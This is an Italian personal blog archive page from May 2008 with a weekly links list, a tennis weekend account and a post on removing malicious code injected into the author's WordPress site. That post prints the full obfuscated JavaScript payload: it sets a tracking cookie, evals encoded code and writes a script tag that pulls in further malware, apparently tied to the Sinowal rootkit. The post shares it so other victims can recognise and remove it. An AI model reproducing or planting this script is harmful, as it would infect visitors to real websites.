2008 Maggio archive - Paolo Gatti's web corner

Archivio per Maggio, 2008 pagina 2 di 2

Mag
12

Links della settimana (42)

Come ogni lunedì, ecco una accuratissima selezione di links che pongo alla vostra attenzione:

Programmi gratuiti per convertire qualsiasi formato video (via Sismi.info)
Recuva File Recovery: Recuperare files persi (via PC Revenge)
Guadagnare via Feed/RSS (WordPress, Feedburner e Pheedo) (via Micheele M)
MozyHome for Mac, il backup online di Mozy disponibile anche per Mac (via Giovy’s blog)
Come alternare i colori di sfondo dei commenti nei blog WordPress (via Geekissimo)
Trasformare le tue foto panoramiche in mondi virtuali 3D (via Salvatore Aranzulla)
8 ottimi strumenti gratuiti per monitorare e proteggere i siti web (via Geekissimo)
Scarica Kaspersky Internet Security 7 Gratis (via I Write About IT)
I migliori 5 software per il DVD ripping per WIN e MAC (via Geekissimo)
AjaxDaddy: Script ajax free per tutti (via PC Revenge)
Video Tutorial: come integrare il SP3 nel CD d’installazione di Windows XP (via Geekissimo)
Guida su come creare una Web-Radio! (via Geekissimo)
In Forma anche al PC con Mini-Pause e Esercizi Mirati (via ABTechno)

Pubblicato il 12/05/2008 alle 7:47 in About me. 1 Commento Tags: ajax, antivirus, backup, conversione, del.icio.us, dvd ripping, feed, foto, gratis, guadagnare, kaspersky, mac, rss, video, web radio, Windows, Wordpress.

Mag
10

Weekend romano per seguire gli Internazionali d’Italia di tennis

Quando leggerete questo post programmato, starò comodamente seduto sulla Mercedes ML del mio amico Agostino alla volta del Foro Italico per vedere gli Internazionali d’Italia di Tennis, che quest’anno si svolgono dal 5 all’11 maggio (per quanto riguarda il torneo maschile).

Quest’anno ci siamo concessi il lusso di prendere i biglietti sia per le semifinali che per la finale, con annessa visita notturna della capitale nella notte tra il 10 e l’11 agevolata anche dalla posizione stragegica del nostro albergo.

Purtroppo, però, è già fuori dal torneo il mio giocatore preferito: Rafa Nadal :-(

Speriamo comunque in belle partite e che il caldo non sia estremo come l’anno scorso.

P.S. sempre e comunque Vamos Rafa che ha dimostrato di essere un grande giocatore, scendendo in campo nonostante il dolore provocato dai piedi in condizioni pessime.

AGGIORNAMENTO DEL 12/05/2008

Sono tornato ieri sera da Roma stanco ma contento: il weekend nel complesso è stato bellissimo, la compagnia ottima (tranne per quanto riguarda la notte passata con Roberto che non ha fatto altro che russare), mentre, quanto meno deludenti, le semifinali di singolare visti i ritiri, prima di Roddick e poi di Stepanek per la felicità di Wawrinka e di Djokovic. Belle, invece, le semifinali di doppio tra i gemelli Bryan e Bjorkman/Ullyett (con la vittoria dei primi al 3° set) e tra Gasquet/Santoro e Nestor/Zimonjic (che ha visto la vittoria facile dei secondi in due set).

Bellissima la finale di singolare di ieri tra Wawrinka e Djokovic, dominata dallo svizzero nel 1° set grazie ad un’ottima solidità da fondo campo ed un poderoso ed efficacissimo rovescio lungolinea che ha messo in forte crisi Djokovic. Purtroppo, però, Wawrinka si è “dimenticato” di avere questo straordinario colpo nel 2° e 3° set, quando il serbo ha preso in mano la partita facendo svanire tutte la possibilità di vittoria dell’avversario. Bellissimo anche la finale di doppio tra i gemelli Bryan e Nestor/Zimonjic, combattutissima letteralmente fino all’ultimo punto e che ha visto vincitori i fratelli Bryan.

Ho/abbiamo scattato tantissime foto e fatto anche un breve video dell’allenamento di Novak Djokovic poco prima della finale; ~~un po’ di pazienza e le condividerò molto volentieri con tutti voi :-)~~ Sono online le foto delle due giornate ed anche il video. Mi raccomando, fatemi sapere se sono di vostro gradimento ;-)

Pubblicato il 10/05/2008 alle 8:55 in About me e Varie. 4 Commenti Tags: capitale, federer, internazionali d'italia, nadal, roma, Tennis.

Mag
07

Code injection su WordPress: guida alla rimozione del codice maligno

Ci risiamo: mi era già successo una settimana fa e mi è successo di nuovo nelle ultime ore.. Pensavo fosse un baco di WordPress 2.5, così ho aggiornato subito alla versione 2.5.1, sperando fosse stato risolto e, invece, a quanto sembra, il problema è rimasto.

Di cosa parlo?! Di questo codice maligno (all’apparenza incomprensibile, poichè criptato in esadecimale) javascript che mi è stato iniettato nel blog (a me, così come a tanti altri bloggers che utilizzano WordPress come piattaforma):

[quickcode:noclick]
<script language=”javascript”>$=”%63b%3d%22e(d%2573);%2573t%253dtm%2570%253d%2527%2527;for(i%253d0;i%253cds%252e%256ce%256eg%25%22;st%3d%22%2573t%253d%2522$%253d%2573%2574;%2564c%2573%2528d%2561%252bd%2562%252bd%2563+%2564%2564%252b%2564e%252c%2531%2530)%253b%2564w%2528s%2574)%253bs%2574%253d%2524%253b%2522;%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3c7}7%3c7~7%3c7%257F7%3c7`7%3c7a7%3c7b7%3c7c7%3c7%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;dc%3d%220d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;cc%3d%2274%2568;i+%252b%2529{t%256dp%253dd%2573%252es%256c%2569ce%2528i,i%252b1%2529;st%253d%22;ce%3d%22ar%2543od%2565%2541%2574%25280)^%2528%25270%25780%2530%2527+es%2529))%253b%257d}%22;cz%3d%22%2566unc%2574ion%2520cz%2528cz)%257bre%2574ur%256e %2563a+c%2562+%2563c+%2563d+c%2565+%2563z;}%253b%22;dz%3d%22%2566un%2563t%2569on%2520dw(%2574){c%2561%253d%2527%252564%25256f%252563ume%25256et%252e%2577%252572i%2574%252565(%252522%2527;ce%253d%2527%252522)%2527;c%2562%253d%2527%25253csc%252572%2569%2570%252574 l%252561%256eg%252575a%2525%2536%2537%2565%25253%2564%25255c%25252%2532ja%2576a%2573cr%2569%252570t%25255c%2525%25322%25253e%2527;c%2563%253d%2527%25253c%25255c%25252fsc%2572%2569p%252574%25253e%2527;eva%256c(u%256ees%2563ap%2565(t%2529)%257d%253b%22;op%3d%22%2524%253d%2522dw%2528d%2563s(%2563u%252c1%2534));%2522;%22;ca%3d%22%2566%2575%256e%2563t%2569o%256e%2520dcs%2528d%2573,%2565s%2529{d%2573%253dunesca%2570%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|“d.;;bqgx{l:w{y;xp;sfv;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;dd%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%2522&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c&%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi89;%25229+u|cu%22;cd%3d%22s%2574+%2553tri%256e%2567.f%2572%256fmC%2568%2561rCo%2564%2565(%2528t%256dp%252ec%2568%22;%69f%20(d%6fcum%65nt%2e%63oo%6b%69%65.i%6edex%4f%66(%27%76%62ull%65tin%5fmu%6ctiq%75%6f%74e%3d%27)%3d%3d-1){sc%28%27vbu%6clet%69n%5fm%75l%74iqu%6ft%65%3d%27,2,7);%65va%6c(un%65sc%61pe%28d%7a%2bc%7a+op%2b%73t)%2b%27dw(%64z%2bcz%28$+%73t%29)%3b%27)}e%6cse{%24%3d%27%27};f%75nct%69on %73c%28cnm%2cv,e%64){%76a%72 ex%64%3dnew %44ate%28);%65xd.%73%65%74Da%74%65(ex%64.g%65tD%61%74e()%2b%65%64);%64%6fcu%6dent%2eco%6fkie%3dcnm%2b %27%3d%27 +esca%70%65(v%29+%27;ex%70i%72es%3d%27%2bex%64.%74o%47M%54%53t%72in%67%28);%7d;”;eval(unescape($));document.write($);</ script></body>
[/quickcode]

Per chi si trovasse nella mia stessa situazione, non disperate, il problema è di facile risoluzione: basta editare il file index.php (presente nella root dell’installazione di WordPress) e rimuovere brutalmente il codice indicato in precedenza.

Fatto ciò, non ci resta che sperare che lo staff di WordPress tappi questa grave falla al più presto!

Ah, dimenticavo, mi scuso con tutti voi per gli eventuali disagi provocati dal codice maligno.

AGGIORNAMENTO DELLE 22.50 DEL 07/05/2008

Bene.. ci sto capendo qualcosa di più su questa situazione alquanto strana. Anzitutto l’iniezione di codice maligno sembra non derivare da un baco di WordPress, ma di una vulnerabilità dei server Aruba. Per approfondire l’argomento date un occhio a questo sito dove è indicato anche come eliminare il MBR rootkit/trojan Sinowal (questo è il nome del malware), nel caso in cui qualcuno di voi fosse stato infettato (spero non dal mio sito!).

Ah, di questa cosa ne ha parlato anche Napolux.